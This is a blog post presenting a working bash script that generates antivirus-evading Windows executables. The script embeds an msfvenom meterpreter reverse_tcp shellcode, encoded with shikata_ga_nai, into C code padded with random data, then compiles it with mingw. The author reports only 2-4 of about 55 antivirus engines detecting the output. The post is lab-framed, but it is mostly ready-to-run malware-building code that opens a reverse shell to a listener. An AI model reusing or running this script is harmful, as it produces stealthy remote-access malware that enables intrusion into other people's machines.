bash script built on technique to bypass AV v2

This script has been improved and is located at this blog post.

I took the previous script that I created and spent some time adding additional padding and moving the meterpreter portion of the c code to a variable inside of the main function.

With these few modifications I was able to achieve the following results as I uploaded them to virustotal.com.

The sample at the top of the screen is using version 1 of the below script.  With the below script the detection rate decreases to 2-4 anti-viruses detecting them out of an average of 55.

The below script is what I used to generate the exe files...

#!/bin/bash
#

# Log file where how the payload was created and the filename of the payload
logFile='/root/bypassAV/logFile.txt'

# Bash script to test payloads created with msfvenom and using a c program to hide against AVG 2015
# Platform: Windows XP SP3
# AV Installed: AVG 2015 Free

# Using the following msfvenom options
# Payload: windows/meterpreter/reverse_tcp
# LHOST: 172.27.66.1
# LPORT: 8080
# Bad Characters: \x00 \xff
# Encoder: x86/shikata_ga_nai
# Iterations: 3
# Output format: C

# Create some padding to be compiled in the C program
function generatePadding {

    counter=0
    randomNumber=$((RANDOM%200+5))
    #echo $randomNumber
    while [  $counter -lt $randomNumber ]; do
        echo "" >> /root/bypassAV/prog.c
        randomCharname=`cat /dev/urandom | tr -dc 'a-zA-Z' | head -c 12`
        randomPadding=`cat /dev/urandom | tr -dc '_a-zA-Z0-9' | head -c 2048`
        echo "unsigned char ${randomCharname}[]=\"$randomPadding\";" >> /root/bypassAV/prog.c
        let counter=counter+1
    done
}

# Check to see if the drive is mounted on the test platform
if [[ ! -f "/mnt/payloadTest/mounted.txt" ]]; then
    mount -t cifs //172.27.66.130/share /mnt/payloadTest -o "username=malware,password=malware"
fi

# Until the prog.exe is compiled successfully loop until it is
while [ ! -f /root/bypassAV/outputFiles/prog.exe ]; do

    # Generate 2048 characters of random awesomeness for padding
    randomFilename=`cat /dev/urandom | tr -dc 'a-zA-Z' | head -c 12`
    randomPadding=`cat /dev/urandom | tr -dc '_a-zA-Z0-9' | head -c 2048`
    echo "unsigned char ${randomFilename}[]=\"$randomPadding\";" > /root/bypassAV/prog.c
   
    generatePadding

    echo "" >> /root/bypassAV/prog.c
    echo "int main(void)" >> /root/bypassAV/prog.c
    echo "{" >> /root/bypassAV/prog.c
   
    generatePadding
   
    echo "" >> /root/bypassAV/prog.c
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.27.66.1 LPORT=8085 -b "\x00\xff" -e x86/shikata_ga_nai -i 3 -f c >> /root/bypassAV/prog.c

    generatePadding

    echo "" >> /root/bypassAV/prog.c
    echo "((void (*)())buf)();" >> /root/bypassAV/prog.c
    echo "" >> /root/bypassAV/prog.c
    echo "}" >> /root/bypassAV/prog.c

    cat /root/bypassAV/prog.c | sed 's/buf/yiopl/g' > /root/bypassAV/prog.c.temp
    mv -f /root/bypassAV/prog.c.temp /root/bypassAV/prog.c
    i586-mingw32msvc-gcc -o /root/bypassAV/outputFiles/prog.exe /root/bypassAV/prog.c
done

# If the prog.exe fails to be created then skip over the remaining commands
if [[ -f "/root/bypassAV/outputFiles/prog.exe" ]]; then

    # Create a random 64 character filename to use as the destination file
    randomFileName=`cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 64 | head -n 1`

    # Save the information to a log file in the event the file bypasses the AV
    echo "${randomFileName}.exe - msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.27.66.1 LPORT=8085 -b \"\x00\xff\" -e x86/shikata_ga_nai -i 3 -f c" >> $logFile

    cp -f /root/bypassAV/outputFiles/prog.exe /mnt/payloadTest/${randomFileName}.exe
    cp -f /root/bypassAV/outputFiles/prog.exe /root/bypassAV/archiveFiles/${randomFileName}.exe
    rm -f /root/bypassAV/outputFiles/prog.exe

fi
# End If for the prog.exe file not being created


Also in researching other techniques I found the below web page:
https://www.pentestgeek.com/2014/07/15/bypassing-antivirus-crypter-cff-explorer/


Comments

Popular posts from this blog

Netflix Streaming Blocked by Sophos UTM

BSides 2016 Hackers Challenge

VBA - Script to Download a file from a URL

Python - Vega Conflict Script to Maximize Fleet Sizes based on Fleet Mass

IoT Malware Analysis - CnC Server - Part 3